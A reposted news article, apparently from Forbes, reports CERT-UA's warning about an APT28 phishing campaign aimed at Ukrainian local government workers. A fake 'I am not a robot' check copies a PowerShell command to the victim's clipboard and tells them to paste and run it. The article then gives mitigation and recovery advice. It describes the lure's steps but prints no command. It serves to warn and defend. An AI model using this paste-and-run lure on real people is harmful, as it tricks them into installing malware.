New Cyber Attack Warning—Confirming You Are Not A Robot Can Be Dangerous

    2
    0
    New Cyber Attack Warning—Confirming You Are Not A Robot Can Be Dangerous


    Update, Oct. 28, 2024: This story, originally published Oct. 26, has been updated with additional cyber attack mitigation advice.

    The Ukrainian Computer Emergency Response Team has issued a new security warning after discovering a cyber attack campaign carried out by the APT28 threat group, also known as Fancy Bear. This group is thought, with a high degree of confidence, to be affiliated with Russian military intelligence operations. Here’s what we know so far and what you need to watch out for if you think you might be at risk of being targeted.

    The APT28 Fancy Bear Cyber Attack Campaign Warning From CERT-UA

    The Ukrainian CERT warning, number CERT-UA#11689, was published Oct. 25 and, courtesy of Google’s on-page language translation tools, detailed an ongoing investigation into a phishing campaign using emails that contain a database table, and a link that delivers what appears to be a Google reCAPTCHA bot-detection dialog.

    ForbesNew Gmail Security Warning As 10-Second Hackers Strike

    The frequency of these anti-bot CAPTCHA tools has reduced considerably for most users, in no small part by the sheer number of browser extensions that help to defeat them and the likes of iOS using Apple’s server-based automatic verification system to bypass the need to complete them yourself. However, it’s still not an altogether unexpected event when one does appear and, something that the Fancy Bear threat group is relying upon, certainly not something that would arouse suspicion in the user. If anything, it’s the opposite: the use of such an anti-bot defense tends to suggest a trustworthy outcome rather than a dangerous one.

    In the case of this cyber attack campaign, CERT-UA said that ticking the checkbox asking for confirmation in response to the “I am not a robot” question will initiate a malicious PowerShell command instruction to the user’s clipboard. APT28 is not to be confused with APT29, known as Midnight Blizzard, another Russian state-sponsored attack group also currently engaged in targeted anti-Ukraine cyber attack activity, as confirmed by Google’s Threat Analysis Group and Mandiant.

    Mitigating The Risk Of Falling Victim To The CAPTCHA Cyber Attack

    OK, so the most important point to be made here is that the cyber attack campaign in question appears to be highly targeted at local government workers in Ukraine. That immediately filters out a lot of the concern that everyone else might have. However, importantly, that doesn’t mean that the same techniques will not be used by other threat actors now that the methodology is out there and apparently fooling some victims. Therefore, you still need to be aware of the threat and how to mitigate it.

    ForbesNSA Tells iPhone And Android Users: Reboot Your Device Now

    Which brings me to the second important point here: the cyber attack is initiated by clicking a link (don’t do that) which causes the I am not a robot dialog to appear in the first place. If you get to this stage of such an attack then more interaction is required to execute the payload of the campaign: the PowerShell command sets off a script instructing the user to take a number of further steps.

    These include: pressing a Win+R combo to open the command prompt, pressing a Win+V combo to paste the malware payload execution instruction, and finally the need to press enter to actually execute it and install the malware itself. That’s a lot of steps, requiring a lot of trust, from the user. Don’t be that trustworthy. Period. Ask yourself, when have I ever been asked to do something like this before? I’d bet my house that the answer to that, for 99.9% of people is, erm, never. So, why start now? With cyber attack campaigns, especially those involving AI-boosted phishing techniques, it’s easy to forget that most still rely upon good old-fashioned trickery. Stay alert, don’t let work pressures or knee-jerk reactions make you take unnecessary risks, and you can keep even state-sponsored hackers at bay.

    ForbesGoogle Adds Nudity Filter, Scam Blocker And More For 1 Billion Messages Users

    What To Do If You Have Been Compromised By This Kind Of Cyber Attack

    In the improbable event that your systems have been compromised by this APT28 cyber attack, or anything similar for that matter, you should activate your incident response plan immediately. If you don’t have an incident response plan, then guidance from the U.K. National Cyber Security Centre suggests taking the following steps to limit any impact:

    • Disconnect infected computers, laptops or tablets from all network connections, whether wired, wireless or mobile phone based.
    • Reset credentials including passwords, after verifying you are not locking yourself out of systems needed for recovery.
    • Wipe infected devices and reinstall the OS.
    • Verify any backup is free from malware before restoring.
    • Connect devices to a clean network in order to download, install and update the OS and all other software.
    • Install, update, and run antivirus software.
    • Monitor network traffic and run antivirus scans to identify if any infection remains.

    Meanwhile, the Federal Trade Commission advises that if you have clicked a link or opened an attachment that may have downloaded malware onto your device then you should do the following:

    • Do not log in to any accounts or enter any sensitive information.
    • Update your security software to make sure you have the latest protections.
    • Execute a security scan once you have the latest updates and remove any malware detected.
    • Change passwords on accounts that might be impacted.
    • Enable two-factor authentication where available to prevent hackers from reconnecting if they have already compromised an account.

    And finally, in the event of any successful cyber attack, you should report this to the relevant authorities whether you have a statutory obligation to or not. The U.S. Government Cybersecurity and Infrastructure Security Agency has such a reporting portal.



    Source link

    LEAVE A REPLY

    Please enter your comment!
    Please enter your name here